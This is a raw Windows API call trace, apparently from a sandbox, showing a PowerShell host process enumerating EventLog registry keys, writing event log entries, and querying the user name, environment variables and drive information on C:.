	[0446.219] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x2, lpName=0x334800, lpcchName=0x12d4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.219] CoTaskMemFree (pv=0x334800) 
	[0446.219] CoTaskMemFree (pv=0x0) 
	[0446.219] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.219] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x3, lpName=0x334800, lpcchName=0x12d4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.219] CoTaskMemFree (pv=0x334800) 
	[0446.219] CoTaskMemFree (pv=0x0) 
	[0446.219] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.219] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x4, lpName=0x334800, lpcchName=0x12d4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.219] CoTaskMemFree (pv=0x334800) 
	[0446.219] CoTaskMemFree (pv=0x0) 
	[0446.219] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.219] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x5, lpName=0x334800, lpcchName=0x12d4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.219] CoTaskMemFree (pv=0x334800) 
	[0446.220] CoTaskMemFree (pv=0x0) 
	[0446.220] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.220] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x6, lpName=0x334800, lpcchName=0x12d4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.220] CoTaskMemFree (pv=0x334800) 
	[0446.220] CoTaskMemFree (pv=0x0) 
	[0446.220] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.220] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x7, lpName=0x334800, lpcchName=0x12d4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.220] CoTaskMemFree (pv=0x334800) 
	[0446.220] CoTaskMemFree (pv=0x0) 
	[0446.220] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.220] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x8, lpName=0x334800, lpcchName=0x12d4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.220] CoTaskMemFree (pv=0x334800) 
	[0446.220] CoTaskMemFree (pv=0x0) 
	[0446.220] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x350) returned 0x0
	[0446.220] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x0) returned 0x2
	[0446.220] RegOpenKeyExW (in: hKey=0x374, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x378) returned 0x0
	[0446.220] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x0) returned 0x2
	[0446.220] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x37c) returned 0x0
	[0446.220] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x0) returned 0x2
	[0446.220] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x380) returned 0x0
	[0446.221] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x0) returned 0x2
	[0446.221] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x384) returned 0x0
	[0446.221] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x0) returned 0x2
	[0446.221] RegOpenKeyExW (in: hKey=0x374, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x388) returned 0x0
	[0446.221] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x0) returned 0x2
	[0446.221] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x38c) returned 0x0
	[0446.221] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x0) returned 0x2
	[0446.221] RegOpenKeyExW (in: hKey=0x374, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x390) returned 0x0
	[0446.221] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x0) returned 0x2
	[0446.221] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x394) returned 0x0
	[0446.222] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x398) returned 0x0
	[0446.222] RegCloseKey (hKey=0x398) returned 0x0
	[0446.222] RegCloseKey (hKey=0x374) returned 0x0
	[0446.222] RegCloseKey (hKey=0x394) returned 0x0
	[0446.223] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d478 | out: phkResult=0x12d478*=0x394) returned 0x0
	[0446.223] RegQueryInfoKeyW (in: hKey=0x394, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d3ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d3e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d3ec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d3e8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.223] CoTaskMemFree (pv=0x0) 
	[0446.223] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.223] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x0, lpName=0x334800, lpcchName=0x12d478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.223] CoTaskMemFree (pv=0x334800) 
	[0446.223] CoTaskMemFree (pv=0x0) 
	[0446.223] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.223] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x1, lpName=0x334800, lpcchName=0x12d478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.223] CoTaskMemFree (pv=0x334800) 
	[0446.223] CoTaskMemFree (pv=0x0) 
	[0446.223] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.223] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x2, lpName=0x334800, lpcchName=0x12d478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.223] CoTaskMemFree (pv=0x334800) 
	[0446.223] CoTaskMemFree (pv=0x0) 
	[0446.223] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.223] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x3, lpName=0x334800, lpcchName=0x12d478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.224] CoTaskMemFree (pv=0x334800) 
	[0446.224] CoTaskMemFree (pv=0x0) 
	[0446.224] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.224] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x4, lpName=0x334800, lpcchName=0x12d478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.224] CoTaskMemFree (pv=0x334800) 
	[0446.224] CoTaskMemFree (pv=0x0) 
	[0446.224] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.224] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x5, lpName=0x334800, lpcchName=0x12d478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.224] CoTaskMemFree (pv=0x334800) 
	[0446.224] CoTaskMemFree (pv=0x0) 
	[0446.224] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.224] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x6, lpName=0x334800, lpcchName=0x12d478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.224] CoTaskMemFree (pv=0x334800) 
	[0446.224] CoTaskMemFree (pv=0x0) 
	[0446.224] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.224] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x7, lpName=0x334800, lpcchName=0x12d478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.224] CoTaskMemFree (pv=0x334800) 
	[0446.224] CoTaskMemFree (pv=0x0) 
	[0446.224] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.224] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x8, lpName=0x334800, lpcchName=0x12d478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.224] CoTaskMemFree (pv=0x334800) 
	[0446.224] CoTaskMemFree (pv=0x0) 
	[0446.224] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x374) returned 0x0
	[0446.224] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x0) returned 0x2
	[0446.225] RegOpenKeyExW (in: hKey=0x394, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x398) returned 0x0
	[0446.225] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x0) returned 0x2
	[0446.225] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x39c) returned 0x0
	[0446.225] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x0) returned 0x2
	[0446.225] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x3a0) returned 0x0
	[0446.225] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x0) returned 0x2
	[0446.225] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x3a4) returned 0x0
	[0446.225] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x0) returned 0x2
	[0446.227] RegOpenKeyExW (in: hKey=0x394, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x3a8) returned 0x0
	[0446.227] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x0) returned 0x2
	[0446.227] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x3ac) returned 0x0
	[0446.227] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x0) returned 0x2
	[0446.227] RegOpenKeyExW (in: hKey=0x394, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x3b0) returned 0x0
	[0446.227] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x0) returned 0x2
	[0446.227] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x3b4) returned 0x0
	[0446.227] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x3b8) returned 0x0
	[0446.227] RegCloseKey (hKey=0x3b8) returned 0x0
	[0446.228] RegCloseKey (hKey=0x394) returned 0x0
	[0446.228] RegCloseKey (hKey=0x3b4) returned 0x0
	[0446.232] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1ba10008
	[0446.235] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d000a0*="WSMan", lpRawData=0x3cffe10) returned 1
	[0446.236] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.236] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.236] CoTaskMemFree (pv=0x2eaa90) 
	[0446.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.238] CoTaskMemAlloc (cb=0x804) returned 0x1b7d88c0
	[0446.238] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7d88c0, nSize=0x12d768 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d768) returned 0x1
	[0446.239] CoTaskMemFree (pv=0x1b7d88c0) 
	[0446.239] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.239] GetUserNameW (in: lpBuffer=0x334800, pcbBuffer=0x12d7a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d7a8) returned 1
	[0446.239] CoTaskMemFree (pv=0x334800) 
	[0446.240] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d055d8*="Alias", lpRawData=0x3d05368) returned 1
	[0446.241] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.241] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.241] CoTaskMemFree (pv=0x2eaa90) 
	[0446.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.243] CoTaskMemAlloc (cb=0x804) returned 0x1b7d88c0
	[0446.243] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7d88c0, nSize=0x12d768 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d768) returned 0x1
	[0446.243] CoTaskMemFree (pv=0x1b7d88c0) 
	[0446.243] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.243] GetUserNameW (in: lpBuffer=0x334800, pcbBuffer=0x12d7a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d7a8) returned 1
	[0446.243] CoTaskMemFree (pv=0x334800) 
	[0446.244] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d0abd0*="Environment", lpRawData=0x3d0a960) returned 1
	[0446.245] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.245] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.245] CoTaskMemFree (pv=0x2eaa90) 
	[0446.246] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.246] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0446.246] CoTaskMemFree (pv=0x2eaa90) 
	[0446.246] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.246] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0446.246] CoTaskMemFree (pv=0x2eaa90) 
	[0446.246] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0446.247] SetErrorMode (uMode=0x1) returned 0x1
	[0446.247] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x12d520 | out: lpFileInformation=0x12d520*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0446.247] SetErrorMode (uMode=0x1) returned 0x1
	[0446.248] GetLogicalDrives () returned 0x4
	[0446.249] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d080, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0446.252] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0446.252] SetErrorMode (uMode=0x1) returned 0x1
	[0446.253] CoTaskMemAlloc (cb=0x68) returned 0x1b7d18f0
	[0446.253] CoTaskMemAlloc (cb=0x68) returned 0x1b7d1f80
	[0446.253] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b7d18f0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x12d4f0, lpMaximumComponentLength=0x12d4ec, lpFileSystemFlags=0x12d4e8, lpFileSystemNameBuffer=0x1b7d1f80, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12d4f0*=0x9c354b42, lpMaximumComponentLength=0x12d4ec*=0xff, lpFileSystemFlags=0x12d4e8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0446.253] CoTaskMemFree (pv=0x1b7d18f0) 
	[0446.253] CoTaskMemFree (pv=0x1b7d1f80) 
	[0446.253] SetErrorMode (uMode=0x1) returned 0x1
	[0446.254] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0446.254] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d230, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0446.254] SetErrorMode (uMode=0x1) returned 0x1
	[0446.254] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d490 | out: lpFileInformation=0x12d490*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0446.254] SetErrorMode (uMode=0x1) returned 0x1
	[0446.254] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d230, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0446.254] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0446.254] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0446.255] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d010, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0446.255] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0446.255] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d060, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0446.255] SetErrorMode (uMode=0x1) returned 0x1
	[0446.255] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d2c0 | out: lpFileInformation=0x12d2c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0446.255] SetErrorMode (uMode=0x1) returned 0x1
	[0446.255] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d060, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0446.255] SetErrorMode (uMode=0x1) returned 0x1
	[0446.255] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d2c0 | out: lpFileInformation=0x12d2c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0446.256] SetErrorMode (uMode=0x1) returned 0x1
	[0446.256] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d100, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0446.256] SetErrorMode (uMode=0x1) returned 0x1
